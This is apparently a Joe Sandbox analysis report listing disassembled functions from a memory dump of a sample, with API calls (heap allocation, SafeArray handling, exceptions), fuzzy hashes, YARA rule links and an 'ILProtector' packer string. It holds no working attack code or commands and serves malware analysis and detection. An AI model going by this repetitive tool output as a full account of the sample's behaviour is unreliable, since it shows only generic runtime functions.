Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc
String ID:
API String ID: 3153320871-0
Opcode ID: d1d9cfd5b3d2499d2350d8249e9ec353fa8708e65b2a8f9130f58902a02cc2ae
Instruction ID: 6a024c20213804d8424ca01f8c645814fa9e41efab29bf3ae22ec4b3c539d922
Opcode Fuzzy Hash: d1d9cfd5b3d2499d2350d8249e9ec353fa8708e65b2a8f9130f58902a02cc2ae
Instruction Fuzzy Hash: F83164B1900708AFCB14DF98D841A9AF7F8FF55750F1086AEE8199B740EB30A904CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A8D80 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6F8A8D8A

Part of subcall function 6F8D9D66: __FF_MSGBANNER.LIBCMT ref: 6F8D9D7F
Part of subcall function 6F8D9D66: __NMSG_WRITE.LIBCMT ref: 6F8D9D86
Part of subcall function 6F8D9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6F8D9BD4,6F871290,8E16AAE4), ref: 6F8D9DAB

Part of subcall function 6F8D91F6: std::_Lockit::_Lockit.LIBCPMT ref: 6F8D9202

_malloc.LIBCMT ref: 6F8A8DAF
std::exception::exception.LIBCMT ref: 6F8A8DD4
__CxxThrowException@8.LIBCMT ref: 6F8A8DEB

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
String ID:
API String ID: 3043633502-0
Opcode ID: 2ca50483c7f08cb5a693ce36c89d2eeab749b410119608456ba922f14a45a425
Instruction ID: a4f65cc95f66beb12e1c336323eb9c839cc52ab47e86afd18684d38f7156717b
Opcode Fuzzy Hash: 2ca50483c7f08cb5a693ce36c89d2eeab749b410119608456ba922f14a45a425
Instruction Fuzzy Hash: 78F0F6724043157BD204EB599D65B9F32B89FD1654F400C9DF9649A185EB25D10DC1B3

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D9BB5 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6F8D9BCF

Part of subcall function 6F8D9D66: __FF_MSGBANNER.LIBCMT ref: 6F8D9D7F
Part of subcall function 6F8D9D66: __NMSG_WRITE.LIBCMT ref: 6F8D9D86
Part of subcall function 6F8D9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6F8D9BD4,6F871290,8E16AAE4), ref: 6F8D9DAB

std::exception::exception.LIBCMT ref: 6F8D9C04
std::exception::exception.LIBCMT ref: 6F8D9C1E
__CxxThrowException@8.LIBCMT ref: 6F8D9C2F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: cf497bb504e63ea3e072662707e9eb83d2f4810380352effe9a5ba9fd6a54460
Instruction ID: 5c876ed00a8aa9e1bbba451900f72139b61b16c762927e93d2b01e563e9f22fa
Opcode Fuzzy Hash: cf497bb504e63ea3e072662707e9eb83d2f4810380352effe9a5ba9fd6a54460
Instruction Fuzzy Hash: B9F0A93150161DBFDF08EF68CD25A9D7AB9AF4276CF100CE9F5109E2C9DB719606C650

Uniqueness

Uniqueness Score: -1.00%

Function 6F886C60 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6F886C73
SafeArrayAccessData.OLEAUT32(00000000,6F886C3C), ref: 6F886C87
_memmove.LIBCMT ref: 6F886C9A
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F886CA3

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
String ID:
API String ID: 3147195435-0
Opcode ID: a61e5ae197a302e705d4ba0d1a468f228bb3e2c4b12099ebb4cb3c1ddb94b5ef
Instruction ID: 4c60626d0124d100d57af6d8efabdcb3e9b781d4cb00fcf116fbb68bab336c3c
Opcode Fuzzy Hash: a61e5ae197a302e705d4ba0d1a468f228bb3e2c4b12099ebb4cb3c1ddb94b5ef
Instruction Fuzzy Hash: CCF05E75211218BBEB115F91DC89F9B3BACEFC67A1F008056FA188E240E670D950CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A1FD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F8A2206
__CxxThrowException@8.LIBCMT ref: 6F8A2221

Part of subcall function 6F8A6480: __CxxThrowException@8.LIBCMT ref: 6F8A6518
Part of subcall function 6F8A6480: __CxxThrowException@8.LIBCMT ref: 6F8A6558

Strings

ILProtector, xrefs: 6F8A2045

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throw$_mallocstd::exception::exception
String ID: ILProtector
API String ID: 84431791-1153028812
Opcode ID: b1aeb1d9b1912a2a62992798318a2ae1d1fa082b906aa506ec5a9e7ae09bae54
Instruction ID: fc3680a0bf0deae57d5e35429eb0be421b1978ae466670b70e1f4e13bded4c67
Opcode Fuzzy Hash: b1aeb1d9b1912a2a62992798318a2ae1d1fa082b906aa506ec5a9e7ae09bae54
Instruction Fuzzy Hash: F7712771905659AFDB14CFA8C840BDEBBB4EF4A314F1085AAE419AB340DB346A44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F889110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6F88913B
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6F88915C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6F889170
LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6F889191

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 5b720f79009164e07be69c9353cac7fcd2d89a7fecb8789a9e1b4d780c02e1fb
Instruction ID: 8dfa5a275284ce5924f164b432bdc1355b90b1b1ffd3ac454633d123dd56df3d
Opcode Fuzzy Hash: 5b720f79009164e07be69c9353cac7fcd2d89a7fecb8789a9e1b4d780c02e1fb
Instruction Fuzzy Hash: E5413376900209DFCB04DF99D9848EEBBB5FF88710B50859ED926AB354D730EA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6F875450 Relevance: 4.8, APIs: 3, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::tr1::_Xweak.LIBCPMT ref: 6F8756D7
std::exception::exception.LIBCMT ref: 6F875734
__CxxThrowException@8.LIBCMT ref: 6F87574B

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8ThrowXweak_mallocstd::exception::exceptionstd::tr1::_
String ID:
API String ID: 2092180293-0
Opcode ID: 8ae680103f2c20416cb5c4dd4567f254e5a4845eb4f1daee42d1319c158c6096
Instruction ID: 6b04c009e2a091b4289ad017d28b77e4e6b15da21e1970e21199ce434f76cc7a
Opcode Fuzzy Hash: 8ae680103f2c20416cb5c4dd4567f254e5a4845eb4f1daee42d1319c158c6096
Instruction Fuzzy Hash: 5DA137B45047058FC724CF28C48096AB7F6FF88754F548F8EE49A8B684E770EA49CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6F888E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6F888E89
LeaveCriticalSection.KERNEL32(?,00000000), ref: 6F888EAD
_memset.LIBCMT ref: 6F888ED2

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: CriticalSection$EnterLeave_memset
String ID:
API String ID: 3751686142-0
Opcode ID: fe7cb5e7db3b1035b20582064c3e0f36b9865bf01fb4cd6b453d7cb174bddf8b
Instruction ID: 7cb26bf2187fcdc74cc81614b6b14577791b85dd279fb000a727ed4bc8cacd9e
Opcode Fuzzy Hash: fe7cb5e7db3b1035b20582064c3e0f36b9865bf01fb4cd6b453d7cb174bddf8b
Instruction Fuzzy Hash: 1C514F74A04209EFCB48CF58C990E9AB7B6FF89304F108999E91A9F381D731ED55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F893A90 Relevance: 4.6, APIs: 3, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F893B71
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F893B83
SafeArrayDestroy.OLEAUT32(?), ref: 6F893BCF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy
String ID:
API String ID: 3651546500-0
Opcode ID: dd4698f45cc25f7fecdd1ceaddd9ded08abf49b3507e0d7952893e7db90d88b7
Instruction ID: 5433bdf9b6559188463da0cd53910248fcbfc428b248369814f0ba93c9521fad
Opcode Fuzzy Hash: dd4698f45cc25f7fecdd1ceaddd9ded08abf49b3507e0d7952893e7db90d88b7
Instruction Fuzzy Hash: BF418A71208601AFD615CF1CC881E5AF7E9FFD9254F104E8EF8A89B290D670ED85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F8969C0 Relevance: 4.6, APIs: 3, Instructions: 128COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F896A08
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F896A15
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F896A41

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: 176cc987fe2317e1daa0c2fab1ec6c8cb53bb149b52fc8c8739233937c18ed84
Instruction ID: c3cd6aa6417ca63beccefd9347365f6851e39dd2bc9df660f6244ab57d7e6e4c
Opcode Fuzzy Hash: 176cc987fe2317e1daa0c2fab1ec6c8cb53bb149b52fc8c8739233937c18ed84
Instruction Fuzzy Hash: 4C413D75A0061A9FDB04DF68C981EEF77F8EF4A360F108699E9119B280D731E941CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F88DFB0 Relevance: 4.6, APIs: 3, Instructions: 120COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F88DFF6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F88E003
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F88E02F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: 55437f2f3098bb3394f08c12c552e8d61991f43b5a6daf178bcf5cd0a26b3611
Instruction ID: 025009f2936472406bbc90bb6bf0e556f364ecd4051bef067252257d60b752e4
Opcode Fuzzy Hash: 55437f2f3098bb3394f08c12c552e8d61991f43b5a6daf178bcf5cd0a26b3611
Instruction Fuzzy Hash: F241FE75A00619DFCB14DFD8C8C4DAEB7B5FB89310B104AAAE535EB390D731A942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F88D920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6F88D949
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6F88D96C
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F88D9CF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: a187a293e57d3fb00e5fdc592a26629990a55f33a8291b2c11e003551406b559
Instruction ID: ca8183e436e7f71a3ae53f073a1934885c114eadc170e4cbea8c219c74899a7f
Opcode Fuzzy Hash: a187a293e57d3fb00e5fdc592a26629990a55f33a8291b2c11e003551406b559
Instruction Fuzzy Hash: C521AC32600244AFEB11CF98CC88FAB77E9EF8A750F10449AE914DF284D771E801CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F89DB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F89DB2D
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F89DB45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F89DBA2

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: eaf07608862ae55bcc65ae1714e44707cde9da0c1fb172e69c19406e546b66a0
Instruction ID: d4e5b00adccf26e8e2c23d42289c8144a50eb9b1d5bbb63acab5eac359e5db1c
Opcode Fuzzy Hash: eaf07608862ae55bcc65ae1714e44707cde9da0c1fb172e69c19406e546b66a0
Instruction Fuzzy Hash: 1F118F76642205AFD700DF69C888F9ABBB8FF5A314F04819AE958DB341D730E951CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A3EB0 Relevance: 3.2, APIs: 2, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F8A4042

Part of subcall function 6F8D9533: std::exception::_Copy_str.LIBCMT ref: 6F8D954E

__CxxThrowException@8.LIBCMT ref: 6F8A4059

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C04
Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C1E
Part of subcall function 6F8D9BB5: __CxxThrowException@8.LIBCMT ref: 6F8D9C2F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 2813683038-0
Opcode ID: a317246741adac063bfa5db429af83f7b27a6171bf2a7e48d827f8da27abc9ae
Instruction ID: a1819e45989aecbd95339ca94d47b4c67699ad969b293641368c46ed4489eaa1
Opcode Fuzzy Hash: a317246741adac063bfa5db429af83f7b27a6171bf2a7e48d827f8da27abc9ae
Instruction Fuzzy Hash: 56919EB1804704AFDB04CFA9C841B9AFBF8FF95344F154D9AE4159F2A0E7B6D9048B92

Uniqueness

Uniqueness Score: -1.00%

Function 6F88BDF7 Relevance: 3.2, APIs: 2, Instructions: 200COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F88BE2D
IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6F88BE6D

Memory Dump Source

